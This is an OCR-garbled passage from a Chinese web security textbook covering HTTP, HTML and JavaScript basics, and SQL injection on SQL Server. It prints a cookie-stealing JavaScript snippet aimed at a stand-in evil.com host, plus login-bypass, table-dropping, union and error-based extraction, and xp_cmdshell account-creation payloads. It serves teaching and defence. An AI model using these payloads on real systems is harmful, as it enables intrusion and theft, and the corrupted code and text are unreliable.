URL 的 编码 方式 有 三 类 : escape、encodeURI、encodeURIComponent, 这 三 个 编码 函 
数 是 有 差异 的 ,浏览 器 在 自动 URL 编码 中 也 存在 差异 。 
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URL 的 请 求 协议 几乎 都 是 HTTP, 它 是 一 种 无 状态 的 请 求 响应 , 即 每 次 的 请 求 响应 
之 后 ,连接 会 立即 断 开 或 延 时 断 开 (保持 一 定 的 连接 有 效 期 ), 断 开 后 ,下 一 次 请 求 再 重新 
建立 。 这 里 举 一 个 简单 的 例子 ,对 http://www. foo. com/ 发 起 一 个 GET 请 求 , 如 图 8-1 
所 示 。 


GET / HTTP/1.1 

Accept: image/gif, image/jpeg, image/pjpeg, image/pipeg, application/x-shockwave-flash, 
application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, 
application/xaml+xml, */* 

Accept-Language: zh-cn 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 
2.b.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 

Accept-Encoding: gzip, deflate 

Host: wwy,fo0,com 


图 8-1 GET 请 求 


其 响应 如 图 8-2 所 示 。 


HTTP/1.1 200 OK 

Cache-Control: max-age=0, private, must-revalidate 

Content-Type: text/html; charset=utf-8 

Date: Sun, 31 Nay 2015 16:58:19 GMT 

ETag: "c2c87764£467093a25536eSbeg2bOlée" 

Server: nginx/1.1.19 

Set-Cookie: 
_digiadmin2_seasion=BAh7BOkiD3N1c3NPpb25ftaWQGOg2FRkkigWI3OWUx2]1x2zjdmzDhhMzIzMDQwN2EONJN2N2IONmV 
JBjsAVEkiEF5]Jc3JmX3Rva2VuB]JsARKkkiNT1QWL1UzMVZSTGNho211UGZOeGNPTnRaTnhyVzg3TVdBT292MktoQUSnTTO9B 
jsARgy3DS3D--4abdb60dc65cBf67eel125dBb5db9b32aft7565bBb; path=/; HttpOnly 

Status: 200 OK 

K-Request-Id: 513a3a995f28ft6f0724dccagfBe7Taca 

X-Runtime: 0.035303 

X-UA-Compatible: IE=Edge,chrome=1 

Content-Length: 3227 

Connection: keep-alive 


<!DOCTYPE html> 
<html 


图 8-2 200 OK 响应 


请 求 与 响应 一 般 都 分 为 首部 与 体 部 (它们 之 间 以 空 行 分 隔 )。 对 于 请 求 体 来 说 ,一 般 
出 现 的 POST 方法 中 ,比如 包含 表单 的 键 值 对 。 响 应 体 就 是 在 浏览 器 中 看 到 的 内 容 , 比 
如 ,HTML/JavaScript/XML 等 。 这 里 的 重点 在 这 个 首部 ,首部 的 每 一 行 都 有 自己 的 含 
义 ,key 与 value 之 间 以 冒号 分 隔 , 下 面 看 看 几 个 关键 点 。 

请 求 首 部 中 的 几 个 关键 点 如 下 。 


GT HITP/1.1 


这 一 行 必 不 可 少 ,常见 的 请 求 方法 有 GET/POST, 最 后 的 “HTTP/1. 1 表示 HTTP 
协议 的 版 本 号 。 


host:www.foo.ccom 


这 行 也 必 不 可 少 , 表 明 请 求 的 主机 是 什么 。 
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User- Bgent: Mbzilla/5.0 (Windows NT 6.1) AppleWecKit/535.19 (KHIML, likeGecko) Chrame/18.0.1025.3 
Safari/535.19 
User-Agent 用 于 表明 身份 ,从 这 里 可 以 看 到 操作 系统 、 浏 览 器 、 浏 览 器 内 核 及 对 应 的 
版 本 号 等 信息 。 


Cookie: SESSIONTID= 58ABA20BID88800526MDOCAAB3AB2TA3: FG=1 


前 面 说 到 HTTP 是 无 状态 的 ,那么 每 次 连接 时 ,服务 端 如 何 知道 你 是 上 一 次 的 哪个 ? 
这 里 通过 Cookies 进行 会 话 跟踪 ,第 一 次 响应 时 设置 的 Cookies 在 随后 的 每 次 请 求 中 都 
会 发 送出 去 。Cookies 还 可 以 包括 登录 认证 后 的 身份 信息 。 

响应 首部 中 的 几 个 关键 点 如 下 。 


HTTP/1.1 200 OK 
这 一 行 肯定 有 ,200 是 状态 码 ,OK 是 状态 描述 。 
Server: nginx/1.1.19 


上 述 语 句 透 露 了 服务 端的 一 些 信息 : Web 容器 、 操 作 系 统 、 服 务 端 语言 及 对 应 的 
版 本 。 


Content- Length: 3227 
是 响应 体 的 长 度 。 
Content- Type: text/html; harset=utf- 8 


是 响应 资源 的 类 型 与 字符 集 。 针 对 不 同 的 资源 类 型 会 有 不 同 的 解析 方式 ,这 个 会 影响 浏 
览 器 对 响应 体 里 的 资源 解析 方式 ,字符 集 也 会 影响 浏览 器 的 解码 方式 ,两 者 都 可 能 带 来 安 
全 问题 。 

每 个 Set-Cookie 都 设置 一 个 Cookie( 类 似 key= value) ,随后 是 如 下 内 容 。 

请 求 响应 首部 常见 的 一 些 字 段 有 必要 了 解 , 这 是 后 面 研 究 Web 安全 时 对 各 种 HTTP 
数据 包 分 析 的 前 提 。 

HTML 里 可 以 有 脚本 样式 等 内 容 的 嵌入 ,以 及 图 片 . 多 媒体 等 资源 的 引用 。 我 们 看 
到 的 网 页 就 是 一 个 HTML 文档 ,比如 下 面 这 段 就 是 HTML。 


<html> 
<head> 
<title> HIMK /title> 
<meta http- equiv= "Content- TYPe" content= "text/html; harset= utf- 8" /> 
<style> 
/* 这 里 是 样式 * / 
body { font- size: 14px ;} 
</style> 
<script> 
三 1; /* 这 里 是 脚本 x*/ 
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< /script> 
< /head> 
<body> 
<div 
<h/> 这 些 都 是 EMI< /hl><br /> 
< img src= "http://www.foo.cqw1ogo.jpg" title= "这 里 是 图 片 引用 " /> 
< /div> 
< /body> 
< /htm> 
人 们 经 常 说 HTML 组 成 是 松散 的 ,是 因为 HTML 是 由 众多 标签 组 成 的 ,标签 内 还 
有 对 应 的 各 种 属性 。 这 些 标签 可 以 不 区 分 大 小 写 , 有 的 可 以 不 需要 闭合 。 属 性 的 值 可 以 
用 单 引 号 、 双 引号 、 反 单 引 号 包围 住 , 甚 至 不 需要 引号 。 多 余 的 空格 与 Tab 毫 不 影响 
HTML 的 解析 。HTML 里 可 以 内 内 JavaScript 等 内 容 , 而 不 强调 分 离 ,然而 很 多 前 端 安 
全 问题 就 是 因为 松散 导致 的 。 
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在 Web 安全 中 ,JavaScript 控制 了 整个 前 端的 逻辑 ,通过 JavaScript 可 以 完成 许多 操 
作 。 举 个 例子 ,用 户 在 网 站 上 可 以 提交 内 容 , 然 后 可 以 编辑 与 删除 ,这些 JavaScript 几乎 
都 可 以 完成 。 大 多 数 情况 下 ,有 了 XSS 漏洞 ,就 意味 着 可 以 注入 任意 的 JavaScript, 也 就 
意味 着 被 攻击 者 的 任何 操作 都 可 以 模拟 ,任何 隐私 信息 都 可 以 获取 到 。 可 以 说 ， 
JavaScript 就 是 跨 站 之 瑰 。 

在 浏览 器 中 ,用 户 发 出 的 请 求 基本 上 都 是 HTTP 协议 里 的 GET 与 POST 方式 。 对 
于 GET 方式 ,实际 上 就 是 一 个 URL ,方式 有 很 多 ,常见 的 如 下 : 


// 新 建 一 个 img 标 签 对 象 ,对 象 的 src 属 性 指向 目标 地 址 

Dew Jmage () .src= "http://www.evil.om/steal .php "+ escape (Gocument.cookie)7 
// 在 地 址 栏 里 打开 目标 地 址 

location.href— "http://www.evil.cm/steal .php "+ escape(document.cookie); 


这 两 种 方式 原理 是 相通 的 ,通过 JavaScript 动态 创建 iframe/frame/script/link 等 标 
签 对 象 ,然后 将 它们 的 src 或 href 属性 指向 目标 地 址 即 可 。 

对 于 POST 的 请 求 ,XMLHttpRequest 对 象 就 是 一 个 非常 方便 的 方式 ,可 以 模拟 表 
单 提交 ,如 下 是 一 段 的 示例 : 


xhr= function() { 
/* zhr 对 象 */ 
if (window. XMLHttpRequest) 
request— new XMLHttPRequest (); 
else if (window.ActiveXxcbject) 
request— new window. Activexcbject ("Microsoft .XMIHTTP'); 
retum request; }; 
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request= function (method, src, argv, oontent type) { 
zhr.open (method, src, false) /* 同步 方式 * / 
证 ethod- 'FOST") 
3hr.setRequestHeader('Content- Type"，content_ type); 
/* 设置 表单 的 Content- Type 类 型 * / 
xhr.send (argv); /* 发送 POST 数 据 * / 
retum xhr.responseText; /* 返 回响 应 的 内 容 * / ]7 


attack ar finction() { 
Var src= "http://ww.evil.om/steal .php "7 
Var argv_ (=" gnamel= valuelgname 2=value2 "7 
Tequest ("FOSI", src, argv. 0, "application/x- wwr form- urlenooded"); }; 


attack a()7 


POST 表单 提交 的 Content-Type 为 application/x-www-form-urlencoded, 这 是 一 种 
默认 的 标准 格式 。 在 前 端 黑客 攻击 中 ,比如 XSS 经 常 需要 发 起 各 种 请 求 (如 盗 取 
Cookies 蠕虫 攻击 等 ) ,这 里 介绍 的 POST 方式 都 是 XSS 攻击 常用 的 。 


8.2 SQL 注入 漏洞 


SQL 注入 漏洞 (SQL injection) 是 Web 层面 最 高 危 的 漏洞 之 一 。 在 2008 年 至 2010 
年 期 间 ,SQL 注入 漏洞 连续 3 年 在 OWASP 年 度 十 大 漏洞 排行 中 排名 第 一 。 

在 2005 年 前 后 ,SQL 注入 漏洞 到 处 可 见 , 在 用 户 登录 或 者 搜索 时 ,只 需要 输入 一 个 
单 引号 就 可 以 检测 出 这 种 漏洞 。 随 着 Web 应 用 程序 的 安全 性 不 断 提 高 ,SQL 注入 漏洞 
逐渐 减少 ,同时 也 变 得 更 加 难以 检测 与 利用 。 
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想 要 更 好 地 研究 SQL 注入 ,就 必须 深入 了 解 每 种 数据 库 的 SQL 语法 及 特性 。 虽 
然 现在 的 多 数 数据 库 都 会 遵循 SQL 标准 ,但 是 每 种 数据 库 也 都 有 自己 的 单行 函数 及 特 
性 。 下 面 通过 一 些 经 典 的 万 能 密码 案例 来 介绍 SQL 注入 漏洞 ,本 次 环境 为 JSP 十 SQL 
Server, 

图 8-3 是 一 个 正常 的 登录 表单 ,输入 正确 的 账号 和 密码 后 ,JSP 程序 会 查询 数据 库 : 
如 果 存 在 此 用 户 并 且 密 码 正 确 , 将 会 成 功 登录 , 跳 转 至 FindMsg 页 面 : 如 果 用 户 不 存在 
或 者 密码 不 正确 , 则 会 提示 账号 或 者 密码 错误 。 

在 登录 界面 中 ,密码 本 身 可 以 随意 填写 或 者 不 写 , 然 后 单 击 " 登 录 ” 按 钮 。 接 下 来 通过 
webscarab 工具 抓 包 将 提交 页 面 中 的 密码 修改 ,添加 一 段 比较 特殊 的 字符 串 “' or 1 一 1”， 
随后 发 现 是 可 以 正常 登录 的 ,如 图 8-4 所 示 。 

比较 奇怪 的 是 为 什么 随意 输入 密码 都 可 以 进入 后 台 呢 ? 进入 数据 库 查 看 ,发 现 
Neville 用 户 只 对 应 smith 密码 ,根本 没有 后 缀 为 “'or 1' 二 1” 这 个 密码 。 难 道 是 程序 出 错 
了 吗 ? 下 面 详细 分 析 此 程序 ,看 看 问题 到 底 出 现在 何 处 。 
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# You have completed Stage 1: String SQL Injec 


S 


# Welcone to Stage 2: Paraneterized Query #1 
< 
7/ Goat Hils Financial 
治 Human Resources 
[WW welcome Back Neville - Staff Listing Page 


elect from the list below 


eaplo A 
Noe Stooge (nanager) SearchStaff 
Curly Stooge (eaployee) 

Eric Walker (eaployee) VievProfils 


Tom Cat (eaployee) 


G 
Jerry Wouse (hr) Se 


| Neville Bartholomew (admin) 汪 David Gianbi Graseez) DeleteProfile 
Bruce WcGuirre (exployee 
Password|_ 四 Sean Livingston (exployee) 
Joanne WcDougal (hr) 
a John Wayne (adain) ieee) 
图 8-3 登录 界面 图 8-4 万 能 密码 登录 成 功 


首先 ,提交 正确 的 账号 为 Neville, 密码 为 smith, 跟 踪 SQL 语句 ,发 现 最 终 执行 的 
SQL 语句 为 : 

Select count (* ) fram admin where usemame= 'Neville' and password= 'smith' 

在 数据 库 中 ,存在 Neville 用 户 , 并 且 密 码 为 smith, 所 以 此 时 用 户 可 以 成 功 登录 。 

接 下 来 继续 在 密码 smith 后 面 输 入 特殊 字符 串 “or 1' 二 1”, 并 跟踪 SQL 语句 ,最 终 执 
行 SQL 语句 为 : 


Select coont (* ) from admin where usemame= 'Neville' and password= 'smith' or 
CO 


终于 找到 问题 的 根源 了 ,从 开发 人 员 的 角度 理解 ,SQL 语句 的 本 义 是 : 

username= ' 账 户 ' and password- ' 密 码 '， 

现在 却 变 为 : 

usemame= "账户 ' and password ' 密 码 ' or '1'='1' 

此 时 的 password 根本 起 不 了 任何 作用 ,因为 无 论 它 正确 与 否 ,password 二 密码 ' or 
1' 王 1' 这 条 语句 永远 为 真 。 

很 显然 ,可 以 顺利 通过 验证 ,登录 成 功 。 这 就 是 一 次 最 简单 的 SQL 注入 过 程 。 虽然 
过 程 很 简单 ,但 其 危害 却 很 大 ,比如 ,在 密码 位 置 处 输入 以 下 SQL 语句 

or 1'='1'; drop table admin -一 

因为 SQL Server 支持 多 请 句 执行 ,所 以 这 里 可 以 直接 删除 admin 表 。 

由 此 可 知 ,SQL 注入 漏洞 的 形成 原因 就 是 : 用 户 输入 的 数据 被 SQL 解释 器 执行 。 

仅仅 知道 SQL 注入 漏洞 形成 的 原因 还 不 足以 完美 地 做 好 SQL 注入 的 防护 工作 , 因 


为 它 是 防不胜防 的 。 下 面 将 详细 介绍 攻击 者 SQL 注入 的 常用 技术 ,以 做 好 Web 防 注入 
工作 。 
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常见 的 SQL 注入 类 型 包括 : 数字 型 和 字符 型 。 也 有 人 把 类 型 分 得 更 多 、 更 细 。 但 不 
管 注入 类 型 如 何 , 攻 击 者 的 目的 只 有 一 点 , 那 就 是 绕 过 程序 限制 ,使 用 户 输入 的 数据 带 入 
数据 库 执行 ,利用 数据 库 的 特殊 性 获取 更 多 的 信息 或 者 更 大 的 权限 。 

1. 数字 型 注入 

当 输 入 的 参数 为 整 型 时 ,如 ID、 年 龄 页码 等 ,如 果 存 在 注入 漏洞 , 则 可 以 认为 是 数字 
型 注入 ,数字 型 注入 是 最 简单 的 一 种 。 假 设 有 URL 为 HTTP://www. xxser. com/test. 
php?id 一 8, 可 测 猜测 SQL 语句 为 : 


select * fram table where id-=8 


测试 步骤 如 下 。 

(1) HTTP://www. xxser. com/test. php?id 一 8'。 

SQL 语句 为 : select * from table where id 一 8' ,这样 的 语句 肯定 会 出 错 , 导 致 脚本 程 
序 无 法 从 数据 库 中 正常 获取 数据 ,从 而 使 原来 的 页 面 出 现 异 常 。 

(2) HTTP://www. xxser. com/test. php?id=8 and 1 一 1 。 

SQL 语句 为 select * from table where id 二 8 and 1 一 1 ,语句 执行 正常 ,返回 数据 与 
原始 请 求 无 任何 差异 。 

(3) HTTP://www. xxser. com/test. php?id=8 and 1 一 2。 

SQL 语句 变 为 select * from table where id=8 and 1 王 2 ,语句 执行 正常 ,但 却 无 法 
查询 出 数据 ,因为 “and 1 一 2? 始 终 为 假 。 所 以 返回 数据 与 原始 请 求 有 差异 。 

如 果 以 上 三 个 步骤 全 部 满足 , 则 程序 就 可 能 存在 SQL 注入 漏洞 。 

这 类 数字 型 注入 最 多 出 现在 ASP.PHP 等 弱 类 型 语言 中 , 弱 类 型 语言 会 自动 推导 变 
量 类 型 ,例如 ,参数 id=8,PHP 会 自动 推导 变量 id 的 数据 类 型 为 int 类 型 ,那么 id 一 8 and 
1 二 1, 则 会 推导 为 string 类 型 ,这 是 弱 类 型 语言 的 特性 。 而 对 于 Java、C# 这 类 强 类 型 语 
言 , 如 果 试 图 把 一 个 字符 串 转 换 为 int 类 型 , 则 会 抛 出 异常 ,无 法 继续 执行 。 所 以 , 强 类 型 
的 语言 很 少 存在 数字 型 注入 漏洞 , 强 类 型 请 言 在 这 方面 比 弱 类 型 语言 有 优势 。 

2. 字符 型 注入 

当 输入 参数 为 字符 串 时 , 称 为 字符 型 。 数 字 型 与 字符 型 注入 最 大 的 区 别 在 于 : 数字 
类 型 不 需要 单 引 号 闭合 ,而 字符 串 类 型 一 般 要 使 用 单 引 号 来 闭合 。 

数字 型 例句 如 下 : 


select * fram table where id=-8 
字符 型 例句 如 下 : 
Select * fram table where usemame= 'admin’ 


字符 型 注入 最 关键 的 是 如 何 闭合 SQL 语句 以 及 注释 多 余 的 代码 。 
当 查 询 内 容 为 字符 串 时 ,SQL 代码 如 下 : 


Select * fram table where usemanme= 'admin' 
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当 攻击 者 进行 SQL 注入 时 ,如 果 输 入 “admin and 1 二 1”, 则 无 法 进行 注入 。 因 为 
“admin and 1 一 1 会 被 数据 库 当 作 查 询 的 字符 串 ,SQL 语句 如 下 : 


Select * fram table where Username= "admin and J]=1" 


这 时 想 要 进行 注入 , 则 必须 注意 字符 串 闭 合 问题 。 如 果 输 入 “admin' and 1 一 1 一 一 ” 
就 可 以 继续 注入 ,SQL 语句 如 下 : 


select * from table where usemame= "admin' and =1-—" 


只 要 是 字符 串 类 型 注入 ,都 必须 闭合 单 引 号 以 及 注释 多 余 的 代码 。 例 如 , update 
语句 : 


update Person set usemame= "Usemame', set password= "password' where id=1 


在 对 该 SQL 语句 进行 注入 ,就 需要 闭合 单 引 号 ,可 以 在 usemame 或 password 处 插 
入 语句“' 十 (select @@version) 十 ”, 最 终 执行 的 SQL 语句 为 : 

Update Person set usemame= "Usemame', set Password= ' '+ (Select 6 version)+' ' where id=1 

利用 两 次 单 引 号 闭合 才 完 成 SQL 注入 。 

注意 : 数据 库 不 同 , 字 符 串 连接 符 也 不 同 , 如 SQL Server 的 连接 符号 是 “十 ”,Oracle 
的 连接 符 是 “||”,MySQL 的 连接 符 是 空格 。 

例如 ,insert 语句 : 

jnsert into users (usemame, password, title) values ("usemmame'，"password'，'"title") 

当 注 入 title 字段 时 ,可 以 像 update 注入 一 样 ,直接 使 用 以 下 SQL 语句 ， 

jnsert into users (usemame, password, title) values ('usemame', ‘password', ' '+ (select @ @ version)+" 

和 

3. SQL 注入 分 类 

一 般 认为 SQL 注入 只 分 为 数字 型 与 字符 型 ,但 是 很 多 初学 者 可 能 会 问 不 是 还 有 
Cookie 注入 .POST 注入 、 盲 注 、 延 时 等 注入 吗 ? 没 错 , 确 实 如 此 ,不 过 也 仅仅 是 以 上 两 大 
类 的 不 同 展现 形式 ,或 者 不 同 的 展现 位 置 。 

那么 ,为 什么 一 般 认为 SQL 注入 只 分 为 数字 型 与 字符 型 呢 ? 因为 对 数据 库 进行 数据 
查询 时 ,输入 数据 一 般 只 有 两 种 : 一 个 是 数字 类 型 ,比如 where id 二 1、where age 二 20 , 另 
外 是 一 个 字符 串 类 型 ,比如 where name 一 root'\where datetime 之 2013-08-18'。 

可 能 不 同 的 数据 库 的 比较 方式 不 一 样 , 但 带 入 数据 库 查 询 时 一 定 是 字符 串 。 所 以 ,无 
论 是 POST 注入 ,还 是 其 他 类 型 注入 ,都 可 归纳 为 数字 型 注入 或 者 字符 型 注入 。 

注意 : 严格 地 说 ,数字 也 是 字符 串 , 在 数据 库 中 进行 数据 查询 时 ,where id 一 1 也 是 合 
法 的 ,只 不 过 在 查询 条 件 为 数字 时 一 般 不 会 加 单 引号 。 

那么 Cookie 注入 .POST 注入 等 是 怎么 回 事 呢 ? 其 实 这 类 注入 主要 通过 注入 的 位 置 
来 分 辨 ,比如 有 以 下 请 求 : 


POST /user/login.php HITP/1.1 
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Host: www.secbug.org 

Proxy- Connecticn: keep- alive 

Content- Iength: 53 

Cache- Control: max- age=0 

User- Pgent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHIMD, like Gecko) 

Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0 

Content- Type: application/x- wwr form Urlencoded 

Cookie: jkb 1066F1 

Usermame= admingpassword= 123456 

此 时 为 POST 请 求 , 但 是 POST 数据 中 的 username 字段 存在 注入 漏洞 ,一 般 都 会 直 
接 说 POST 注入 , 却 不 再 考虑 username 是 什么 类 型 的 注入 。 

以 下 是 一 些 常见 的 注入 法 。 

。 POST 注入 : 注 和 字段 在 POST 数据 中 。 

。 Cookie 注入 : 注入 字段 在 Cookie 数据 中 。 

。 延 时 注入 : 使 用 数据 库 延 时 特性 注入。 

。 搜索 注入 : 注入 处 为 搜索 的 地 点 。 

。 base64 注入 : 注入 字符 串 需要 经 过 base64 加 密 。 
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对 大 多 数 数据 库 而 言 ,SQL 注入 的 原理 基本 相似 ,因为 每 个 数据 库 都 遵循 一 个 SQL 
语法 标准 。 但 它们 之 间 也 存在 许多 细微 的 差异 ,包括 语法 、 函 数 的 不 同 。 所 以 ,在 针对 不 
同 的 数据 库 注 入 时 ,思路 ,方法 也 不 可 能 完全 一 样 。 接 下 来 ,以 SQL Server 2008 数据 库 
的 注入 作为 实例 说 明 。 

攻击 者 对 数据 库 注入 ,无 非 是 利用 数据 库 获取 更 多 的 数据 或 者 更 大 的 权限 ,那么 利用 
方式 可 以 归 为 以 下 三 大 类 : 

(1) 查询 数据 。 

(2) 读 写 文件 。 

(3) 执行 命令 。 

1. 利用 错误 消息 提取 信息 

SQL Server 是 一 个 非常 优秀 的 数据 库 , 它 可 以 准确 地 定位 错误 消息 ,对 开发 人 员 来 
说 这 是 一 件 十 分 美好 的 事情 ,对 攻击 者 来 说 也 是 一 件 十 分 美好 的 事情 ,因为 攻击 者 可 以 通 
过 错误 消息 提取 数据 。 

(1) 枚 举 当 前 表 及 列 。 现 在 有 一 张 表 ,结构 如 下 : 


create table users( 

iaq int not null identity(，1) 
Usemame Varchar (20) not noll, 
password varchar (20) not null, 
privs int not null, 

email varchar (50)) 
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查询 root 用 户 的 详细 信息 ,SQL 语句 如 下 : 

Select * fraom users where Username= 'root" 

攻击 者 可 以 利用 SQL Server 特性 来 获取 敏感 信息 ,输入 如 下 语句 : 

' having |=1-— 

最 终 执行 SQL 语句 为 ， 

Select * from Users where Username= 'Toot' and password= 'Toot' having ]=] 一 -" 

那么 SQL 执行 器 将 抛 出 一 个 错误 : 

消息 8120, 级 别 16, 状 态 1 第 2 行 

选择 列表 中 的 列 users. id 无 效 , 因 为 该 列 没有 包含 在 聚合 函数 或 GROUP BY 子 
句 中 。 

可 以 发 现 当 前 表 名 为 users ,并 且 存 在 ID 列 名 ,攻击 者 可 以 利用 此 特性 继续 得 到 其 他 
列 名 。 

(2) 利用 数据 类 型 错误 提取 数据 。 如 果 试 图 将 一 个 字符 串 与 非 字 符 串 比较 ,或 者 将 
一 个 字符 串 转 换 为 另外 一 个 不 兼容 的 类 型 时 ,那么 SQL 编辑 器 将 会 抛 出 异常 ,比如 以 下 
SQL 语句 : 

Select * fram users where usemame= 'root' and password= 'root' and 1> (select top 1 usemame fran 

users) 

执行 器 错误 提示 : 

消息 245, 级 别 16, 状 态 1 第 2 行 

在 将 varchar 值 root 转换 成 数据 类 型 int 时 失败 。 

可 以 发 现 root 账户 已 经 被 SQL Server 给 “出 卖 ”* 了 ,利用 此 方法 可 以 递归 推导 出 所 
有 的 账户 信息 。 

如 果 不 嵌 入 子 查询 ,也 可 以 使 数据 库 报错 ,这 就 用 到 了 SQL Server 的 内 置 函 数 
CONVERT 或 者 CASE 两 数 ,这 两 个 函数 的 功能 是 : 将 一 种 数据 类 型 转换 为 另外 一 种 数 
据 类 型 。 输 入 如 下 SQL 语句 : 

Select * from users where usemame= 'root" and password= "root' and 1> oonvert (int, (select top 1 users. 

Usemame from users)) 

如 果 感 觉 递归 比较 麻烦 ,可 以 通过 使 用 FOR XML PATH 语句 将 查询 的 数据 生成 
XML。 执 行 器 抛 出 异常 : 


消息 245, 级 别 16, 状 态 1 第 1 行 


在 将 nvarchar 值 root|root,admin|admin,xxser|xxser 转换 成 数据 类 型 int 时 失败 。 
2. 获取 元 数据 
SQL Server 提供 了 大 量 视图 .便于 取得 元 数据 。 下 面 使 用 INFORMATION _ 
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SCHEMA. TABLES 与 INFORMATION_SCHEMA. COLUMNS 视图 来 取得 数据 库 表 
以 及 表 的 字段 。 
取得 当前 数据 库 表 语 句 如 下 ,执行 结果 如 表 8-1 所 示 。 


Select TABIE NAME from INFEOFMATICN SCHFEMA.TRBIFS 
取得 Student 表 字 段 语 句 如 下 ,执行 结果 如 表 8-2 所 示 。 


select OOLUUM_ NAME fram INFORMATION SCHEMA.OOUMNS where TABIE NAME=" Student ' 


表 8-1 查询 数据 库 表 表 8-2 ”Student 表 字段 
序号 TABLE_NAME 序号 COLUMN_NAME 
1 Result 1 StudentNo 
2 Student 2 LoginPwd 
3 tests 3 StudentName 
4 users 4 Sex 
5 Grade 5 Gradeld 
6 Subject 6 Phone 


3. order by 子 句 

order by 子 句 为 select 查询 的 列 排序 ,如 果 同 时 指定 了 top 关键 字 ,order by 子 句 在 
视图 .内 联 函 数 、 派 生 表 和 子 查询 中 无 效 。 攻 击 者 通常 会 注入 order by 语句 来 判断 此 表 
的 列 数 。 

(1) select id,usemame,password from users where id 二 1,SQL 执行 正常 。 

(2) select id,usemame,password from users where id 二 1 order by 1 ,按照 第 1 列 排 
序 ,SQL 执行 正常 。 

(3) select id,usemame,password from users where id 二 1 order by 2 ,按照 第 2 列 排 
序 ,SQL 执行 正常 。 

(4) 以 此 类 推 …… 

在 SQL 请 句 中 ,只 查询 了 n 一 1 列 , 如 果 要 求 数据 库 按照 第 n 列 排序 ,数据 库 抛 出 异 
常 ,攻击 者 也 得 知 了 当前 SQL 语句 有 几 列 存在 ,从 而 可 以 配合 union 关键 字 进 行 下 一 步 
的 攻击 。 

4. union 查询 

union 关键 字 将 两 个 或 更 多 个 查询 结果 组 合 为 单个 结果 集 ,俗称 联合 查询 ,大 部 分 数 
据 库 都 支持 union 查询 。 

(1) 联合 查询 探测 字段 数 。 前 面 介绍 的 users 表 中 ,查询 id 字段 为 1 的 用 户 , 正 常 的 
SQL 语句 为 : 


select id, usemame, password fram users where id=1 
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使 用 nuion 查询 对 id 字段 注入 ,SQL 语句 如 下 : 

select id, usemame, password, sex fram users where jd 1 nion select null 

数据 库 发 出 异常 : 

消息 205, 级 别 16, 状 态 1 第 1 行 

使 用 union、intersect 或 except 运算 符合 并 的 所 有 查询 必须 在 其 目标 列表 中 有 相同 
数目 的 表达 式 。 

递归 查询 ,直到 无 错误 产生 ,可 得 知 users 表 查 询 的 字段 数 。 

(2) 联合 查询 敏感 信息 。 前 面 已 经 介绍 了 如 何 获取 字段 数 , 接 下 来 攻击 者 使 用 union 
关键 字 查询 敏感 信息 ,union 查询 可 以 在 SQL 注入 中 发 挥 非常 大 的 作用 。 

如 果 得 知 列 数 为 n, 可 以 使 用 以 下 语句 继续 注入 : 


id 5 union select 'x', null, mull, null from sysobject where xtype= 'U' 


如 果 第 1 列 数据 类 型 不 匹配 ,数据 库 将 会 报错 ,这 时 可 以 继续 递归 查询 ,向 后 轮换 x 
直到 请 句 正常 执行 为 止 。 一 旦 语句 执行 正常 ,代表 数据 类 型 兼容 ,就 可 以 将 x 换 为 SQL 
语句 ,查询 敏感 信息 。 

5. 危险 的 存储 过 程 

存储 过 程 (Stored Procedure) 是 在 大 型 数据 库 系 统 中 为 了 完成 特定 功能 的 一 组 SQL 
“函数 ”, 如 执行 系统 命令 ,查看 注册 表 , 读 取 磁 盘 目 录 等 。 

攻击 者 最 常 使 用 的 存储 过 程 是 xp_cmdshell, 这 个 存储 过 程 允许 用 户 执 行 操作 系统 


命令 。 

例如 ,http://www. secbug. org/test. aspx?id 王 1 存在 注入 点 ,那么 攻击 者 就 可 以 实 
施 命令 攻击 : 

http://www.sedoug.org/test .aspx?id= 1;exec xp_anmishell net user test test/add’ 

最 终 执 行 SQL 语句 如 下 : 


Select * fram table where jdF 1; exec xp_amdshell 'net user test test/add' 


攻击 者 可 以 直接 利用 xp_cmdshell 操纵 服务 器 。 

攻击 者 也 可 能 会 自己 写 一 些 存 储 过 程 ,比如 1/O 操作 (文件 读 / 写 ) ,这 些 都 是 可 以 实 
现 的 。 另 外 ,任何 数据 库 在 使 用 一 些 特殊 的 函数 或 存储 过 程 时 ,都 需要 有 特定 的 权限 , 否 
则 无 法 使 用 。 
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SQL 注入 攻击 的 问题 最 终归 于 用 户 可 以 控制 输入 。 这 验证 了 一 句 老 话 : 有 输入 的 地 
方 ,就 可 能 存在 风险 。 想 要 更 好 地 防止 SQL 注入 攻击 ,就 必须 清楚 一 个 概念 : 数据 库 只 
负责 执行 SQL 语句 ,根据 SQL 语句 来 返回 相关 数据 。 数 据 库 并 没有 什么 好 的 办 法 直接 
过 滤 SQL 注入 ,即使 是 存储 过 程 也 不 例外 。 了 解 此 点 后 ,就 明白 防御 SQL 注入 ,还 是 得 
从 代码 人 手 。 
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在 使 用 程序 语言 对 用 户 输入 过 滤 时 ,首先 要 考虑 的 是 用 户 的 输入 是 否 合法 。 但 这 一 
任务 太 难 ,程序 根本 无 法 识别 。 例 如 ,在 注册 用 户 时 ,用 户 填写 姓名 为 张 三 , 密 码 为 
ZhangSan,E-mail 为 xxser@xxser. comySQL 语句 如 下 : 

insert into users (usemame, password) values(' 张 三 ', "ZhangSan', ‘xxser@ xxser.com'); 

如 果 输 入 邮箱 为 “' 十 (select @@version) 十 ”, 则 造成 了 一 次 SQL 注入 攻击 。 

如 果 在 程序 中 禁止 或 者 过 滤 单 引号 ,也 不 是 真正 解决 问题 的 办 法 ,例如 ,外 国人 的 名 
字 很 多 都 会 包含 一 个 单 引号 。 另 外 ,在 数字 型 注入 中 也 不 一 定 会 用 单 引号 。 

如 果 禁 止 输入 查询 语句 ,如 select、insert、union 关键 字 , 也 不 是 完善 的 过 滤 方 案 , 攻 
击 者 可 以 通过 很 多 方法 绕 过 关键 字 , 如 sel/ * * /ect, 使 用 注释 对 关键 字 进 行 分 割 。 

SQL 注入 防御 有 很 多 种 ,根据 SQL 注入 的 分 类 ,防御 主要 分 为 两 种 : 数据 类 型 判断 
和 特殊 字符 转 义 ,下 面 我 们 以 此 深入 展开 。 

1. 严格 的 数据 类 型 

Java、C# 等 强 类 型 语言 几乎 可 以 完全 忽略 数字 型 注入 ,攻击 者 想 在 此 代码 中 注入 是 
